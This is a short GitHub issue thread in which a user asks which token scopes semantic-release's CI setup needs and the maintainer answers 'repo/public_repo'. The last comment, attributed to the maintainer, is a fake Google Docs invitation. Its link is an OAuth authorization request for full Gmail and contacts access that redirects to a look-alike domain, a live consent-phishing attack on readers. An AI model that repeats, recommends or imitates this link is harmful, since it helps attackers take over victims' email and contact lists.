### ISSUE TITLE
docs: add GitHub token scope

### ISSUE THREAD

**Issue by tlvince** [boennemann/semantic-release#15]
In the CI Server set up, we need to add a GitHub OAuth token. Which scope(s) need to be selected here? I presume its just `repo`/`public_repo`, but it'd be nice to have that documented either way.

**Comment by boennemann** [comment]
Hey Tom,




nice catch. You're right it's 'repo/public_repo'. Do you want to send a PR?




Stephan

**Comment by boennemann** [comment]
Stephan Bönnemann has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=623002641392-km6voeicvso16uuk7pvc8mvbqheobnft.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.docscloud.win%2Fg.php&customparam=customparam>
